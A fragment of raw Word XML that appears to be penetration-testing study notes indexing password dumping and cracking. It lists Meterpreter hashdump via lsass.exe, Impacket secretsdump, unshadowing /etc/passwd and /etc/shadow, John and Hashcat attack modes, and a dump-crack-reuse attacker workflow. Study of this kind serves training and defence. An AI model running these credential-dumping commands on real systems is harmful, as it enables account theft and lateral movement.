                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B622F8" w:rsidRPr="006F5A04" w14:paraId="44CC7EAE" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B1E9368" w14:textId="54E361DF" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>secretsdump.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F09E621" w14:textId="4ADB10BE" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="008E2EE0" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Impacket’s script to extract NTDS.di and SYSTEM registry data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CE68A9" w14:textId="0283DDEC" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E921214" w14:textId="60A7E997" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="008E2EE0" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>30</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Reads password hashes from memory. Migrate to lsass.exe, then dump hashes.  Ps -S lsass.exe  migrate 620  hashdump</w:t>
            </w:r>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aad3b435b51404  NTHASH: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37EBDAED" w14:textId="77777777" w:rsidR="00303D06"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Early UNIX and Linux systems store password hashes with DES encryption (often without a salt). Usernames and passwords hashes stored in /etc/passwd file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4B0983" w14:textId="166F5157"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Later, MD5 password hashes were used, followed by blowfish SHA-256, and SHA-512 (all using salt values; 4-byte, then 8-byte)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A3F9EC0" w14:textId="77777777"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Usernames and other information in /etc/passwd (world readable)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E69CB7" w14:textId="1E2042D8"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Password in hashes in /etc/shadow.</w:t>
            </w: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F6DB976" w14:textId="4D1924A5" w:rsidR="00C076D8" w:rsidRDefault="00C076D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Using multiple rounds of hashing makes the hash calculation slow. For a normal user, this may be a 1 second delay in logging in. for an attacker iterating through a word list, this slows down the attack significantly.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D53B319" w14:textId="52975C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r w:rsidR="00C076D8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – SHA</w:t>
            </w:r>
            <w:r w:rsidR="0093480F">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>256 - 512</w:t>
            </w:r>
            <w:r w:rsidR="00C076D8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: 5000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39D12C0B" w14:textId="77777777" w:rsidR="00303D06"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Single-iteration password hashing is considered insecure.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11FA7EA9" w14:textId="77777777" w:rsidR="0093480F"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Linux MD5 hashing ($1) uses 1000 rounds.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E56ED43" w14:textId="77777777" w:rsidR="0093480F"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Linux SHA-256 ($5) and SHA-512 ($6) hashing uses 5000 rounds.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4C0AAB" w14:textId="53029A47" w:rsidR="0093480F" w:rsidRPr="0093480F" w:rsidRDefault="0093480F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="73"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093480F">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>This makes password cracking considerably slower for attackers, attackers counter with offloading onto GPUs.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AE155D">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>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32B68E5E" w14:textId="77777777" w:rsidR="00303D06"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Password Based Key Derivation Function 2 (PBKDF2) uses a flexible number of rounds (2 hashes per round). Widely used and recommended by NIST, may not mitigate GPU acceleration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0614D4AC" w14:textId="16D123A9" w:rsidR="00AE155D"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Scrypt requires 1000x as much memory, which is hard for GPUs to accommodate in parallel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56951692" w14:textId="43BF9036" w:rsidR="00AE155D"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Argo2, Yescrypt modern alternatives with advances features.</w:t>
            </w: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A95FF15" w14:textId="3BFA9B8E" w:rsidR="00303D06" w:rsidRDefault="00EE0D6D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fundamental technique for attackers:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5BA891" w14:textId="765CA880"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Exploit a system of low-to-medium importance.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42583A12" w14:textId="77777777"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Dump all available password hashes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461295BF" w14:textId="77777777"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Crack password hashes for as long as necessary.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DC85B6" w14:textId="208BE591"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Reuse recovered passwords to access high-importance targets.</w:t>
            </w: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5E656454" w14:textId="03DE56AB" w:rsidR="00EE0D6D" w:rsidRPr="00EE0D6D" w:rsidRDefault="00EE0D6D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="76"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supported on Windows, Linux and macOS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCADB6D" w14:textId="5F34E09A" w:rsidR="00EE0D6D" w:rsidRPr="00EE0D6D" w:rsidRDefault="00EE0D6D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="76"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>To run John, supply it with a password hash file:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A18442" w14:textId="1523EB11" w:rsidR="00EE0D6D" w:rsidRDefault="00EE0D6D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Merge /etc/passwd/ and /etc/shadow files together to unshadow.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFD9B5B" w14:textId="03EA092E" w:rsidR="00EE0D6D" w:rsidRPr="00EE0D6D" w:rsidRDefault="00EE0D6D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>For windows passwords, give john the text-based output from Meterpreter, Mimikatz or Impacket.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFCE785" w14:textId="47D8AC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unshadow /etc/passwd /etc/shadow &gt; combined</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2496350D" w14:textId="446ED5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4F964458" w14:textId="77777777" w:rsidR="00303D06"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Single Crack mode: --single</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760ADD0F" w14:textId="013C9AE6" w:rsidR="00DE1DB0" w:rsidRPr="00DE1DB0" w:rsidRDefault="00DE1DB0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE1DB0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Wordlist Mode: --wordlist </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1DB0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FBC52A" w14:textId="77777777" w:rsidR="00DE1DB0"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Incremental mode: --incremental</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FD491D" w14:textId="09DE6444" w:rsidR="00DE1DB0"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External Mode : --external</w:t>
            </w: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73FEFD99" w14:textId="04F84EB1"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t>John supports (and autodetects) many password hash formats, all the UNIX and Linux variants.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EF9852" w14:textId="521E22A9"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t xml:space="preserve">Many more has formats are also supported. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69248489" w14:textId="3ABB413E"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lastRenderedPageBreak/>
              <w:t>Must specify --format=NT for hashdump from windows targets (default to LANMAN)]</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1DB0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Cracked password printed to the screen and stored in the file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381E28E7" w14:textId="41B5BC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55FA21E8" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00DE1DB0" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>John is straightforward and quick, but not ideal for long password cracking jobs.</w:t>
            </w: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Hash and Cracking Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="383DC870" w14:textId="561ABE80" w:rsidR="00303D06" w:rsidRDefault="00DE1DB0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hashcat can crack a wide variety of different password hashes, </w:t>
            </w:r>
            <w:r w:rsidR="00DD15F3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>specified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with</w:t>
            </w:r>
            <w:r w:rsidR="00DD15F3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -m such as Office file password, Database hashing functions, OS hashes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671F34D6" w14:textId="77777777" w:rsidR="00DD15F3" w:rsidRDefault="00DD15F3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Uses GPUs to tremendously accelerate password cracking performance.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A337BE" w14:textId="77777777" w:rsidR="00DD15F3" w:rsidRDefault="00DD15F3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports multiple modes of attack for flexible password cracking.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0722154E" w14:textId="717B7AB0" w:rsidR="00DD15F3" w:rsidRPr="00DD15F3" w:rsidRDefault="00DD15F3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Includes support for a robust </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rules</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> engine for password mutation attacks.</w:t>
            </w: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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50EA4005" w14:textId="0367D400"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Straight: use a dictionary wordlist, trying each word as a potential password. -a 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413CB11B" w14:textId="72754B74"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Combinator: use a dictionary wordlist, append each word to every other word as a potential password (specify 2 dictionaries or the same file twice) -a 1.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE5910B" w14:textId="56B34AD2"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Brute-force (mask attack): specify a pattern of passwords and Hashcat tries each, complex syntax but very powerful. -a 3.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C624CD3" w14:textId="207EA741"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Hybrid wordlist + Mask: Combines wordlist and mast attack (append mask to each word in wordlist) -a 6.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F019013" w14:textId="03D1EB23" w:rsidR="00DD15F3" w:rsidRP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Hybrid Mask + wordlist: Same as mode 6, prepend mask to each word in wordlist. -a 7.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C5DDBC" w14:textId="5B0B05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 - By Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D557B6F" w14:textId="26542D3A"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Understanding hashcat attack modes is the difference between fumbling a round and really understanding what attackers can do with this tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CDA568B" w14:textId="21C929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D91354" w:rsidRPr="006F5A04" w14:paraId="3DBBEAB0" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38558104" w14:textId="0CD260DA" w:rsidR="00D91354" w:rsidRPr="006F5A04" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat Straight attack mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434340A2" w14:textId="07CDD12F"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(-a 0) is a the easiest to use, testing each word in the dictionary against the hash. If the user’s password is in the dictionary file, the attacker will recover it quickly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061359F3" w14:textId="7DDEA328" w:rsidR="00D91354" w:rsidRPr="006F5A04" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6E839D" w14:textId="0EB503FB" w:rsidR="00D91354" w:rsidRPr="006F5A04" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D91354" w:rsidRPr="006F5A04" w14:paraId="4C16D874" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A0AD3FE" w14:textId="77777777" w:rsidR="00D91354" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C73A010" w14:textId="76A0C414"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(-a 1) uses 2 wordlists, combining the words of the 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00D91354">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>st</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with all the words of the 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00D91354">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>nd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. This is typically used with one large and one small wordlist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD04D85" w14:textId="77777777" w:rsidR="00D91354" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="343ABAA3" w14:textId="77777777" w:rsidR="00D91354" w:rsidRDefault="00D91354" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Mask Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F00FA17" w14:textId="38FBC730" w:rsidR="00303D06" w:rsidRDefault="00DB7BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>In a mask attack, you specify a pattern that you want to use for guessing passwords, typically combines with reconnaissance to identify company password policy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B683E24" w14:textId="46AA9AE9" w:rsidR="00DB7BB4" w:rsidRPr="00DB7BB4" w:rsidRDefault="00DB7BB4">
